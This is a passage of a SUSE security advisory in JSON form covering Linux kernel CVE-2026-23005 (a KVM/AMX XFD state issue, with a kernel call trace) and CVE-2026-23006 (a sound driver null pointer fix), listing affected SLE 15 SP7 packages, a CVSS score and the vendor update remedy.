exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
